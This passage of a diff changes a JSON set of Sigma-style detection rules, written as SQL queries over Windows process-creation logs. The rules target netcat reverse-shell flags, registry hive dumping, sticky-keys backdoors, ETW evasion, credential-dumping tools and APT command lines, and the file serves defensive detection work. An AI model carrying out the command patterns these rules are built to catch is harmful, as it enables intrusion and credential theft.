ESCAPE '\\')))" + ], + "filename": "proc_creation_win_mssql_susp_child_process.yml" + }, + { + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "status": "experimental", + "description": "Detects the execution of a renamed version of the Plink binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "status": "experimental", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_certutil_ntlm_coercion.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "title": "Potential Ke3chang/TidePool Malware Activity", + "id": "7b544661-69fc-419f-9a59-82ccc328f205", "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", + "author": "Markus Neis, Swisscom", "tags": [ + "attack.g0004", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "title": "Run PowerShell Script from ADS", + "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", + "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" + "filename": "proc_creation_win_powershell_run_script_from_ads.yml" }, { - "title": "PUA - Netcat Suspicious Execution", - "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "status": "experimental", - "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Elise Backdoor Activity", + "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "status": "test", + "description": "Detects Elise backdoor activity used by APT32", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1095" + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate ncat use" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_malware_elise.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", - "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "SafeBoot Registry Key Deleted Via Reg.EXE", + "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", + "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_reg_delete_safeboot.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "HackTool - SafetyKatz Execution", + "id": "b1876533-4ed5-4a83-90f3-b8645840a413", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1555.004" + "attack.t1003.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_hktl_safetykatz.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "title": "PowerShell Base64 Encoded FromBase64String Cmdlet", + "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "status": "test", + "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_powershell_base64_frombase64string.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "title": "Filter Driver Unloaded Via Fltmc.EXE", + "id": "4931188c-178e-4ee7-a348-39e8a7a56821", "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detect filter driver unloading activity via fltmc.exe", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", - "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "status": "experimental", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "cve.2022.29072" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", - "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": 